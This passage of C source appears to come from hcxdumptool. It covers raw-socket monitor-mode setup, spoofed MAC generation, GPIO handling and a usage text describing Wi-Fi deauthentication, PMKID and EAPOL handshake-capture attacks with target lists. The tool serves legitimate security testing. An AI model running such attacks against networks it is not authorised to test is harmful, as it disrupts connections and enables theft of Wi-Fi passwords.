BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_mem, GPIO_BASE +gpioperi); close(fd_mem); if(gpio_map == MAP_FAILED) { fprintf(stderr, "failed to map GPIO memory\n"); return false; } gpio = (volatile unsigned *)gpio_map; return true; } /*===========================================================================*/ static int getrpirev() { static FILE *fh_rpi; static int len; static int rpi = 0; static int rev = 0; static int gpioperibase = 0; static char *revptr = NULL; static char *revstr = "Revision"; static char *hwstr = "Hardware"; static char *snstr = "Serial"; static char linein[128]; fh_rpi = fopen("/proc/cpuinfo", "r"); if(fh_rpi == NULL) { perror("failed to retrieve cpuinfo"); return gpioperibase; } while(1) { if((len = fgetline(fh_rpi, 128, linein)) == -1) { break; } if(len < 15) { continue; } if(memcmp(&linein, hwstr, 8) == 0) { rpi |= 1; continue; } if(memcmp(&linein, revstr, 8) == 0) { rpirevision = strtol(&linein[len -6], &revptr, 16); if((revptr - linein) == len) { rev = (rpirevision >> 4) &0xff; if(rev <= 3) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0x9) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0xc) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if((rev == 0x04) || (rev == 0x08) || (rev == 0x0d) || (rev == 0x00e)) { gpioperibase = GPIO_PERI_BASE_NEW; rpi |= 2; continue; } continue; } rpirevision = strtol(&linein[len -4], &revptr, 16); if((revptr - linein) == len) { if((rpirevision < 0x02) || (rpirevision > 0x15)) { continue; } if((rpirevision == 0x11) || (rpirevision == 0x14)) { continue; } gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; } continue; } if(memcmp(&linein, snstr, 6) == 0) { rpi |= 4; continue; } } fclose(fh_rpi); if(rpi < 0x7) { return 0; } return gpioperibase; } /*===========================================================================*/ static inline bool globalinit() { static int c; static int myseek; static int gpiobasemem = 0; rpirevision = 0; fd_pcapng = 0; fd_ippcapng = 0; fd_weppcapng = 0; fd_rcascanpcapng = 0; errorcount = 0; incommingcount = 0; droppedcount = 0; outgoingcount = 0; day = 0; month = 0; year = 0; hour = 0; minute = 0; second = 0; lat = 0; lon = 0; alt = 0; mydisassociationsequence = 0; mydeauthenticationsequence = 0; mybeaconsequence = 0; myproberequestsequence = 0; myauthenticationrequestsequence = 0; myauthenticationresponsesequence = 0; myassociationrequestsequence = 0; myassociationresponsesequence = 0; myproberesponsesequence = 0; myidrequestsequence = 0; mytime = 0; setbuf(stdout, NULL); gettimeofday(&tv, NULL); myseek = (mac_orig[3] << 16) + (mac_orig[4] << 8) + mac_orig[5] + tv.tv_sec + tv.tv_usec; srand(myseek); myseek = mac_orig[2]; if(myouiap == 0) { myouiap = myvendorap[rand() %((MYVENDORAP_SIZE /sizeof(int)))]; } if(mynicap == 0) { mynicap = (mac_orig[3] << 16) + (mac_orig[4] << 8) + mac_orig[5]; for(myseek = 0; myseek < mac_orig[2]; myseek++) { mynicap += rand() & 0xffffff; } } myouiap &= 0xfcffff; mynicap &= 0xffffff; mac_mybcap[5] = mynicap & 0xff; mac_mybcap[4] = (mynicap >> 8) & 0xff; mac_mybcap[3] = (mynicap >> 16) & 0xff; mac_mybcap[2] = myouiap & 0xff; mac_mybcap[1] = (myouiap >> 8) & 0xff; mac_mybcap[0] = (myouiap >> 16) & 0xff; memcpy(&mac_myap, &mac_mybcap, 6); if(myouista == 0) { myouista = myvendorsta[rand() %((MYVENDORSTA_SIZE /sizeof(int)))]; } if(mynicsta == 0) { mynicsta = rand() & 0xffffff; } myouista &= 0xffffff; mynicsta &= 0xffffff; mac_mysta[5] = mynicsta &0xff; mac_mysta[4] = (mynicsta >> 8) &0xff; mac_mysta[3] = (mynicsta >> 16) &0xff; mac_mysta[2] = myouista & 0xff; mac_mysta[1] = (myouista >> 8) &0xff; mac_mysta[0] = (myouista >> 16) &0xff; memset(&laststam1, 0, 6); memset(&lastapm1, 0, 6); lastrcm1 = 0; lasttimestampm1 = 0; memset(&laststam2, 0, 6); memset(&lastapm2, 0, 6); lastrcm2 = 0; lasttimestampm2 = 0; rcrandom = (rand()%0xfff) +0xf000; for(c = 0; c < 32; c++) { anoncerandom[c] = rand() %0xff; } if((aplist = calloc((APLIST_MAX), APLIST_SIZE)) == NULL) { return false; } aplist_ptr = aplist; aplistcount = 0; if((myaplist = calloc((MYAPLIST_MAX), MYAPLIST_SIZE)) == NULL) { return false; } myaplist_ptr = myaplist; if((pownedlist = calloc((POWNEDLIST_MAX), MACMACLIST_SIZE)) == NULL) { return false; } filterlist_len = 0; filterlist = NULL; if(filterlistname != NULL) { if((filterlist = calloc((FILTERLIST_MAX), MACLIST_SIZE)) == NULL) { return false; } filterlist_len = readfilterlist(filterlistname, filterlist); if(filterlist_len == 0) { return false; } } if(rcascanflag == true) { pcapngoutname = NULL; ippcapngoutname = NULL; weppcapngoutname = NULL; if(rcascanpcapngname != NULL) { fd_rcascanpcapng = hcxcreatepcapngdump(rcascanpcapngname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta); if(fd_rcascanpcapng <= 0) { fprintf(stderr, "could not create dumpfile %s\n", rcascanpcapngname); return false; } } } if(pcapngoutname != NULL) { fd_pcapng = hcxcreatepcapngdump(pcapngoutname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta); if(fd_pcapng <= 0) { fprintf(stderr, "could not create dumpfile %s\n", pcapngoutname); return false; } } if(weppcapngoutname != NULL) { fd_weppcapng = hcxcreatepcapngdump(weppcapngoutname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta); if(fd_weppcapng <= 0) { fprintf(stderr, "could not create dumpfile %s\n", weppcapngoutname); return false; } } if(ippcapngoutname != NULL) { fd_ippcapng = hcxcreatepcapngdump(ippcapngoutname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta); if(fd_ippcapng <= 0) { fprintf(stderr, "could not create dumpfile %s\n", ippcapngoutname); return false; } } wantstopflag = false; signal(SIGINT, programmende); if((gpiobutton > 0) || (gpiostatusled > 0)) { if(gpiobutton == gpiostatusled) { fprintf(stderr, "same value for wpi_button and wpi_statusled is not allowed\n"); return false; } gpiobasemem = getrpirev(); if(gpiobasemem == 0) { fprintf(stderr, "failed to locate GPIO\n"); return false; } if(initgpio(gpiobasemem) == false) { fprintf(stderr, "failed to init GPIO\n"); return false; } if(gpiostatusled > 0) { INP_GPIO(gpiostatusled); OUT_GPIO(gpiostatusled); } if(gpiobutton > 0) { INP_GPIO(gpiobutton); } } if(gpiostatusled > 0) { for (c = 0; c < 5; c++) { GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY +GPIO_DELAY); } } return true; } /*===========================================================================*/ static inline bool opensocket() { static struct ifreq ifr; static struct iwreq iwr; static struct sockaddr_ll ll; static struct ethtool_perm_addr *epmaddr; fd_socket = 0; fd_socket_gpsd = 0; checkallunwanted(); if(checkmonitorinterface(interfacename) == true) { fprintf(stderr, "warning: %s is probably a monitor interface\n", interfacename); } if((fd_socket = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { perror("socket failed (do you have root privileges?)"); return false; } memset(&ifr_old, 0, sizeof(ifr)); strncpy(ifr_old.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr_old) < 0) { perror("failed to get current interface flags"); return false; } memset(&iwr_old, 0, sizeof(iwr)); strncpy(iwr_old.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIWMODE, &iwr_old) < 0) { perror("failed to save current interface mode"); if(ignorewarningflag == false) { return false; } } memset(&ifr, 0, sizeof(ifr)); strncpy( ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0) { perror("failed to set interface down"); if(ignorewarningflag == false) { return false; } } memset(&iwr, 0, sizeof(iwr)); strncpy( iwr.ifr_name, interfacename, IFNAMSIZ -1); iwr.u.mode = IW_MODE_MONITOR; if(ioctl(fd_socket, SIOCSIWMODE, &iwr) < 0) { perror("failed to set monitor mode"); if(ignorewarningflag == false) { return false; } } memset(&iwr, 0, sizeof(iwr)); strncpy( iwr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIWMODE, &iwr) < 0) { perror("failed to get interface information"); if(ignorewarningflag == false) { return false; } } if((iwr.u.mode & IW_MODE_MONITOR) != IW_MODE_MONITOR) { fprintf(stderr, "interface is not in monitor mode\n"); if(ignorewarningflag == false) { return false; } } memset(&ifr, 0, sizeof(ifr)); strncpy( ifr.ifr_name, interfacename, IFNAMSIZ -1); ifr.ifr_flags = IFF_UP; if(ioctl(fd_socket, SIOCSIFFLAGS, &ifr) < 0) { perror("failed to set interface up"); if(ignorewarningflag == false) { return false; } } memset(&ifr, 0, sizeof(ifr)); strncpy( ifr.ifr_name, interfacename, IFNAMSIZ -1); if(ioctl(fd_socket, SIOCGIFFLAGS, &ifr) < 0) { perror("failed to get interface flags"); if(ignorewarningflag == false) { return false; } } if((ifr.ifr_flags & (IFF_UP | IFF_RUNNING | IFF_BROADCAST)) != (IFF_UP | IFF_RUNNING | IFF_BROADCAST)) { fprintf(stderr, "interface may not be operational\n"); if(ignorewarningflag == false) { return false; } } memset(&ifr, 0, sizeof(ifr)); strncpy( ifr.ifr_name, interfacename, IFNAMSIZ -1); ifr.ifr_flags = 0; if(ioctl(fd_socket, SIOCGIFINDEX, &ifr) < 0) { perror("failed to get SIOCGIFINDEX"); return false; } memset(&ll, 0, sizeof(ll)); ll.sll_family = AF_PACKET; ll.sll_ifindex = ifr.ifr_ifindex; ll.sll_protocol = htons(ETH_P_ALL); ll.sll_halen = ETH_ALEN; if(bind(fd_socket, (struct sockaddr*) &ll, sizeof(ll)) < 0) { perror("failed to bind socket"); return false; } epmaddr = malloc(sizeof(struct ethtool_perm_addr) +6); if (!epmaddr) { perror("failed to malloc memory for permanent hardware address"); return false; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); epmaddr->cmd = ETHTOOL_GPERMADDR; epmaddr->size = 6; ifr.ifr_data = (char*)epmaddr; if(ioctl(fd_socket, SIOCETHTOOL, &ifr) < 0) { perror("failed to get permanent hardware address"); free(epmaddr); return false; } if(epmaddr->size != 6) { fprintf(stderr, "failed to get permanent hardware address length\n"); free(epmaddr); return false; } memcpy(&mac_orig, epmaddr->data, 6); free(epmaddr); if((fd_socket_gpsd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror( "gpsd socket failed"); gpsdflag = false; } return true; } /*===========================================================================*/ static bool testinterface() { static struct ifaddrs *ifaddr = NULL; static struct ifaddrs *ifa = NULL; if(getifaddrs(&ifaddr) == -1) { perror("failed to get ifaddrs"); return false; } else { for(ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) { if(ifa->ifa_addr) { if(strncmp(ifa->ifa_name, interfacename, IFNAMSIZ) == 0) { if(ifa->ifa_addr->sa_family == AF_PACKET) { return true; } } } } } return false; } /*===========================================================================*/ static bool get_perm_addr(char *ifname, uint8_t *permaddr, char *drivername) { static int fd_info; static struct iwreq iwr; static struct ifreq ifr; static struct ethtool_perm_addr *epmaddr; static struct ethtool_drvinfo drvinfo; if((fd_info = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror( "socket info failed" ); return false; } memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, ifname, IFNAMSIZ -1); if(ioctl(fd_info, SIOCGIWNAME, &iwr) < 0) { #ifdef DEBUG printf("testing %s %s\n", ifname, drivername); perror("not a wireless interface"); #endif close(fd_info); return false; } epmaddr = malloc(sizeof(struct ethtool_perm_addr) +6); if(!epmaddr) { perror("failed to malloc memory for permanent hardware address"); close(fd_info); return false; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1); epmaddr->cmd = ETHTOOL_GPERMADDR; epmaddr->size = 6; ifr.ifr_data = (char*)epmaddr; if(ioctl(fd_info, SIOCETHTOOL, &ifr) < 0) { perror("failed to get permanent hardware address"); free(epmaddr); close(fd_info); return false; } if(epmaddr->size != 6) { free(epmaddr); close(fd_info); return false; } memcpy(permaddr, epmaddr->data, 6); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1); drvinfo.cmd = ETHTOOL_GDRVINFO; ifr.ifr_data = (char*)&drvinfo; if(ioctl(fd_info, SIOCETHTOOL, &ifr) < 0) { perror("failed to get driver information"); free(epmaddr); close(fd_info); return false; } memcpy(drivername, drvinfo.driver, 32); free(epmaddr); close(fd_info); return true; } /*===========================================================================*/ static void show_wlaninterfaces() { static int p; static struct ifaddrs *ifaddr = NULL; static struct ifaddrs *ifa = NULL; static uint8_t permaddr[6]; static char drivername[32]; if(getifaddrs(&ifaddr) == -1) { perror("failed to get ifaddrs"); } else { printf("wlan interfaces:\n"); for(ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) { if((ifa->ifa_addr) && (ifa->ifa_addr->sa_family == AF_PACKET)) { memset(&drivername, 0, 32); if(get_perm_addr(ifa->ifa_name, permaddr, drivername) == true) { for (p = 0; p < 6; p++) { printf("%02x", (permaddr[p])); } if(checkmonitorinterface(ifa->ifa_name) == false) { printf(" %s (%s)\n", ifa->ifa_name, drivername); } else { printf(" %s (%s) warning: probably a monitor interface!\n", ifa->ifa_name, drivername); } } } } freeifaddrs(ifaddr); } return; } /*===========================================================================*/ __attribute__ ((noreturn)) static inline void version(char *eigenname) { printf("%s %s (C) %s ZeroBeat\n", eigenname, VERSION, VERSION_JAHR); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usage(char *eigenname) { printf("%s %s (C) %s ZeroBeat\n" "usage : %s \n" " press the switch to terminate hcxdumptool\n" " hardware modification is necessary, read more:\n" " https://github.com/ZerBea/hcxdumptool/tree/master/docs\n" "example: %s -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status=3\n" " do not run hcxdumptool on logical interfaces (monx, wlanxmon)\n" " do not use hcxdumptool in combination with other 3rd party tools, which take access to the interface\n" "\n" "options:\n" "-i : interface (monitor mode will be enabled by hcxdumptool)\n" " can also be done manually:\n" " ip link set down\n" " iw dev set type monitor\n" " ip link set up\n" "-o : output file in pcapng format\n" " management frames and EAP/EAPOL frames\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-O : output file in pcapng format\n" " unencrypted IPv4 and IPv6 frames\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-W : output file in pcapng format\n" " encrypted WEP frames\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-c : set scan list (1,2,3,...)\n" " default scan list: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12, 13\n" " maximum entries: 127\n" " allowed channels (depends on the device):\n" " 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14\n" " 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96\n" " 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128\n" " 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159\n" " 161, 165, 169, 173\n" "-t : stay time on channel before hopping to the next channel\n" " default: %d seconds\n" "-T : set maximum ERROR count (hcxdumptool terminates when the value is reached)\n" " errorcount will increase by one, if send packet (tx=xxx) > 3*incomming packets (rx=xxx)\n" " default: %d errors\n" "-E : EAPOL timeout\n" " default: %d = 1 second\n" " value depends on channel assignment\n" "-D : deauthentication interval\n" " default: %d (every %d beacons)\n" " the target beacon interval is used as trigger\n" "-A : ap attack interval\n" " default: %d (every %d beacons)\n" " the target beacon interval is used as trigger\n" "-I : show wlan interfaces and quit\n" "-C : show available channels and quit\n" " if no channels are available, interface is pobably in use or doesn't support monitor mode\n" "-h : show this help\n" "-v : show version\n" "\n" "--filterlist= : mac filter list\n" " format: 112233445566 + comment\n" " maximum line length %d, maximum entries %d\n" " run first --do_rcascan to retrieve information about the target\n" "--filtermode= : mode for filter list\n" " 1: use filter list as protection list (default) in transmission branch\n" " receive everything, interact with all APs and CLIENTs in range,\n" " except(!) the ones from the filter list\n" " 2: use filter list as target list in transmission branch\n" " receive everything, only interact with APs and CLIENTs in range,\n" " from the filter list\n" " 3: use filter list as target list in receiving branch\n" " only receive APs and CLIENTs in range,\n" " from the filter list\n" "--silent : do not transmit!\n" " hcxdumptool is acting like a passive dumper\n" "--disable_active_scan : do not transmit proberequests to BROADCAST using a BROADCAST ESSID\n" " do not transmit BROADCAST beacons\n" " affected: ap-less and client-less attacks\n" "--disable_deauthentications : disable transmitting deauthentications\n" " affected: connections between client an access point\n" " deauthentication attacks will not work against protected management frames\n" "--give_up_deauthentications=: disable transmitting deauthentications after n tries\n" " default: %d tries (minimum: 4)\n" " affected: connections between client an access point\n" " deauthentication attacks will not work against protected management frames\n" "--disable_disassociations : disable transmitting disassociations\n" " affected: retry (EAPOL 4/4 - M4) attack\n" "--disable_ap_attacks : disable attacks on single access points\n" " affected: client-less (PMKID) attack\n" "--give_up_ap_attacks= : disable transmitting directed proberequests after n tries\n" " default: %d tries (minimum: 4)\n" " affected: client-less attack\n" " deauthentication attacks will not work against protected management frames\n" "--disable_client_attacks : disable attacks on single clients\n" " affected: ap-less (EAPOL 2/4 - M2) attack\n" "--do_rcascan : show radio channel assignment (scan for target access points)\n" " this can be used to test if packet injection is working\n" " if no access point responds, packet injection is probably not working\n" " you should disable auto scrolling in your terminal settings\n" " use this collected data for the target list\n" "--ap_mac= : use this MAC address for access point as start MAC\n" " format = 112233445566\n" " format = 112233000000 (to set only OUI)\n" " format = 445566 (to set only NIC)\n" " last octed is set to unicast and global unique (OUI forced)\n" " warning: do not use a MAC of an existing access point in your range\n" "--station_mac= : use this MAC address for station\n" " format = 112233445566\n" " format = 112233000000 (to set only OUI)\n" " format = 445566 (to set only NIC)\n" "--station_vendor= : use this VENDOR information for station\n" " 0: transmit no VENDOR information (default)\n" " 1: Broadcom\n" " 2: Apple-Broadcom\n" " 3: Sonos\n" " 4: Netgear-Broadcom\n" " 5: Wilibox Deliberant Group LLC\n" " 6: Cisco Systems, Inc\n" "--use_gpsd : use GPSD to retrieve position\n" " add latitude, longitude and altitude to every pcapng frame\n" " retrieve GPS information with hcxpcaptool (-g) or tshark:\n" " tshark -r capturefile.pcapng -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment\n" "--save_rcascan= : output rca scan list to file when hcxdumptool terminated\n" "--save_rcascan_raw= : output file in pcapng format\n" " unfiltered packets\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "--enable_status= : enable status messages\n" " bitmask:\n" " 1: EAPOL\n" " 2: PROBEREQUEST/PROBERESPONSE\n" " 4: AUTHENTICATON\n" " 8: ASSOCIATION\n" " 16: BEACON\n" " example: 3 = show EAPOL and PROBEREQUEST/PROBERESPONSE\n" "--poweroff : once hcxdumptool terminated, power off system\n" "--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n" " default = GPIO not in use\n" "--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n" " default = GPIO not in use\n" "--ignore_warning : ignore warnings\n" " try this if you get some driver warnings\n" " do not report issues\n" "--help : show this help\n" "--version : show version\n" "\n" "If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately!\n" "It is not a good idea to merge a lot of small cap/pcap/pcapng files to a big one!\n" "It is much better to run gzip to cmpress the files. Wireshark, tshark and hcxpcaptool will understand this.\n" "\n", eigenname, VERSION, VERSION_JAHR, eigenname, eigenname, TIME_INTERVAL, ERRORMAX, EAPOLTIMEOUT, DEAUTHENTICATIONINTERVALL, DEAUTHENTICATIONINTERVALL, APATTACKSINTERVALL, APATTACKSINTERVALL, FILTERLIST_LINE_LEN, FILTERLIST_MAX, DEAUTHENTICATIONS_MAX, APPATTACKS_MAX); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usageerror(char *eigenname) { printf("%s %s (C) %s by ZeroBeat\n" "usage: %s -h for help\n", eigenname, VERSION, VERSION_JAHR, eigenname); exit(EXIT_FAILURE); } /*===========================================================================*/ int main(int argc, char *argv[]) { static int auswahl; static int index; static bool showinterfaces = false; static bool showchannels = false; static unsigned long long int apmac; static unsigned long long int stationmac; static struct ifreq ifr; maxerrorcount = ERRORMAX; staytime = TIME_INTERVAL; eapoltimeout = EAPOLTIMEOUT; deauthenticationintervall = DEAUTHENTICATIONINTERVALL; deauthenticationsmax = DEAUTHENTICATIONS_MAX; apattacksintervall = APATTACKSINTERVALL; apattacksmax = APPATTACKS_MAX; filtermode = 0; statusout = 0; stachipset = 0; ignorewarningflag = false; poweroffflag = false; gpsdflag = false; staytimeflag = false; activescanflag = false; rcascanflag = false; deauthenticationflag = false; disassociationflag = false; attackapflag = false; attackclientflag = false; myouiap = 0; mynicap = 0; myouista = 0; mynicsta = 0; interfacename = NULL; pcapngoutname = NULL; ippcapngoutname = NULL; weppcapngoutname = NULL; filterlistname = NULL; rcascanpcapngname = NULL; static const char *short_options = "i:o:O:W:c:t:T:E:D:A:IChv"; static const struct option long_options[] = { {"filterlist", required_argument, NULL, HCXD_FILTERLIST}, {"filtermode", required_argument, NULL, HCXD_FILTERMODE}, {"silent", no_argument, NULL, HCXD_SILENT}, {"disable_active_scan", no_argument, NULL, HCXD_DISABLE_ACTIVE_SCAN}, {"disable_deauthentications", no_argument, NULL, HCXD_DISABLE_DEAUTHENTICATIONS}, {"give_up_deauthentications", required_argument, NULL, HCXD_GIVE_UP_DEAUTHENTICATIONS}, {"disable_disassociations", no_argument, NULL, HCXD_DISABLE_DISASSOCIATIONS}, {"disable_ap_attacks", no_argument, NULL, HCXD_DISABLE_AP_ATTACKS}, {"give_up_ap_attacks", required_argument, NULL, HCXD_GIVE_UP_AP_ATTACKS}, {"disable_client_attacks", no_argument, NULL, HCXD_DISABLE_CLIENT_ATTACKS}, {"use_gpsd", no_argument, NULL, HCXD_USE_GPSD}, {"ap_mac", required_argument, NULL, HCXD_AP_MAC}, {"station_mac", required_argument, NULL, HCXD_STATION_MAC}, {"station_vendor", required_argument, NULL, HCXD_STATION_VENDOR}, {"do_rcascan", no_argument, NULL, HCXD_DO_RCASCAN}, {"save_rcascan", required_argument, NULL, HCXD_SAVE_RCASCAN}, {"save_rcascan_raw", required_argument, NULL, HCXD_SAVE_RCASCAN_RAW}, {"enable_status", required_argument, NULL, HCXD_ENABLE_STATUS}, {"ignore_warning", no_argument, NULL, HCXD_IGNORE_WARNING}, {"poweroff", no_argument, NULL, HCXD_POWER_OFF}, {"gpio_button", required_argument, NULL, HCXD_GPIO_BUTTON}, {"gpio_statusled", required_argument, NULL, HCXD_GPIO_STATUSLED}, {"version", no_argument, NULL, HCXD_VERSION}, {"help", no_argument, NULL, HCXD_HELP}, {NULL, 0, NULL, 0} }; auswahl = -1; index = 0; optind = 1; optopt = 0; gpiostatusled = 0; gpiobutton = 0; while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1) { switch (auswahl) { case HCXD_FILTERLIST: filterlistname = optarg; if(filtermode == 0) { filtermode = 1; } break; case HCXD_FILTERMODE: filtermode = strtol(optarg, NULL, 10); if((filtermode < 1) || (filtermode > 3)) { fprintf(stderr, "wrong filtermode\n"); exit(EXIT_FAILURE); } break; case HCXD_SILENT: activescanflag = true; deauthenticationflag = true; disassociationflag = true; attackapflag = true; attackclientflag = true; break; case HCXD_DISABLE_ACTIVE_SCAN: activescanflag = true; break; case HCXD_DISABLE_DEAUTHENTICATIONS: deauthenticationflag = true; break; case HCXD_GIVE_UP_DEAUTHENTICATIONS: deauthenticationsmax = strtol(optarg, NULL, 10); if(deauthenticationsmax < 4) { fprintf(stderr, "wrong deauthentication give up value\n"); exit(EXIT_FAILURE); } break; case HCXD_DISABLE_DISASSOCIATIONS: disassociationflag = true; break; case HCXD_DISABLE_AP_ATTACKS: attackapflag = true; break; case HCXD_GIVE_UP_AP_ATTACKS: apattacksmax = strtol(optarg, NULL, 10); if(apattacksmax < 4) { fprintf(stderr, "wrong ap-attack give up value\n"); exit(EXIT_FAILURE); } break; case HCXD_DISABLE_CLIENT_ATTACKS: attackclientflag = true; break; case HCXD_AP_MAC: apmac = strtoll(optarg, NULL, 16); myouiap = (apmac &0xfcffff000000) >>24; mynicap = apmac & 0xffffff; break; case HCXD_STATION_MAC: stationmac = strtoll(optarg, NULL, 16); myouista = (stationmac &0xffffff000000) >>24; mynicsta = stationmac & 0xffffff; break; case HCXD_STATION_VENDOR: stachipset = strtol(optarg, NULL, 10); if(stachipset >= CS_ENDE) { fprintf(stderr, "wrong station VENDOR information\n"); exit(EXIT_FAILURE); } break; case HCXD_USE_GPSD: gpsdflag = true; break; case HCXD_DO_RCASCAN: rcascanflag = true; break; case HCXD_SAVE_RCASCAN: rcascanflag = true; rcascanlistname = optarg; break; case HCXD_SAVE_RCASCAN_RAW: rcascanflag = true; rcascanpcapngname = optarg; break; case HCXD_ENABLE_STATUS: statusout |= strtol(optarg, NULL, 10); break; case HCXD_GPIO_BUTTON: gpiobutton = strtoll(optarg, NULL, 10); if((gpiobutton < 2) || (gpiobutton > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCXD_GPIO_STATUSLED: gpiostatusled = strtoll(optarg, NULL, 10); if((gpiostatusled < 2) || (gpiostatusled > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCXD_IGNORE_WARNING: ignorewarningflag = true; break; case HCXD_POWER_OFF: poweroffflag = true; break; case HCXD_HELP: usage(basename(argv[0])); break; case HCXD_VERSION: version(basename(argv[0])); break; case 'i': interfacename = optarg; if(interfacename == NULL) { fprintf(stderr, "no interface specified\n"); exit(EXIT_FAILURE); } break; case 'o': pcapngoutname = optarg; break; case 'O': ippcapngoutname = optarg; break; case 'W': weppcapngoutname = optarg; break; case 'c': if(processuserscanlist(optarg) == false) { fprintf(stderr, "unknown channel selected\n"); exit (EXIT_FAILURE); } break; case 't': staytime = strtol(optarg, NULL, 10); if(staytime < 1) { fprintf(stderr, "wrong hoptime\nsetting hoptime to %d\n", TIME_INTERVAL); staytime = TIME_INTERVAL; } staytimeflag = true; break; case 'E': eapoltimeout = strtol(optarg, NULL, 10); if(eapoltimeout < 10) { fprintf(stderr, "EAPOL timeout is to low\n"); exit (EXIT_FAILURE); } break; case 'D': deauthenticationintervall = strtol(optarg, NULL, 10); if(deauthenticationintervall < 1) { fprintf(stderr, "wrong deauthentication intervall\n"); exit (EXIT_FAILURE); } break; case 'A': apattacksintervall = strtol(optarg, NULL, 10); if(apattacksintervall < 1) { fprintf(stderr, "wrong access point attack intervall\n"); exit (EXIT_FAILURE); } break; case 'T': maxerrorcount = strtol(optarg, NULL, 10); break; case 'I': showinterfaces = true; break; case 'C': showchannels = true; break; case '?': usageerror(basename(argv[0])); break; } } if(argc < 2) { fprintf(stderr, "no option selected\n"); return EXIT_SUCCESS; } if(filterlistname == NULL) { filtermode = 0; } if(showinterfaces == true) { show_wlaninterfaces(); checkallunwanted(); return EXIT_SUCCESS; } if(interfacename == NULL) { fprintf(stderr, "no interface selected\n"); exit(EXIT_FAILURE); } if(getuid() != 0) { fprintf(stderr, "this program requires root privileges\n"); exit(EXIT_FAILURE); } if(testinterface() == false) { fprintf(stderr, "interface is not suitable\nhcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter\nthat is not the case\n"); exit(EXIT_FAILURE); } if(ignorewarningflag == true) { printf("warnings are ignored - interface may not work as expected - do not report issues!\n"); } printf("initialization...\n"); if(opensocket() == false) { fprintf(stderr, "failed to init socket\nhcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter\nthat is not the case\n"); if(fd_socket > 0) { memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); ioctl(fd_socket, SIOCSIFFLAGS, &ifr); ioctl(fd_socket, SIOCSIWMODE, &iwr_old); ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old); close(fd_socket); } if(fd_socket_gpsd > 0) { close(fd_socket_gpsd); } exit(EXIT_FAILURE); } if(globalinit() == false) { fprintf(stderr, "failed to init globals\nhcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter\nthat is not the case\n"); if(fd_socket > 0) { memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); ioctl(fd_socket, SIOCSIFFLAGS, &ifr); ioctl(fd_socket, SIOCSIWMODE, &iwr_old); ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old); close(fd_socket); } if(fd_socket_gpsd > 0) { close(fd_socket_gpsd); } exit(EXIT_FAILURE); } if(showchannels == true) { show_channels(); globalclose(); } test_channels(); if(channelscanlist[0] == 0) { fprintf(stderr, "no available channel found in scan list\n"); globalclose(); } if(rcascanflag == false) { processpackets(); } else { processrcascan(); } return EXIT_SUCCESS; } /*===========================================================================*/ hcxdumptool-5.1.7/hcxpioff.c000066400000000000000000000205531350370021700160470ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include "include/version.h" #include "include/rpigpio.h" #define HCX_GPIO_BUTTON 1 #define HCX_GPIO_STATUSLED 2 #define HCX_HELP 'h' #define HCX_VERSION 'v' 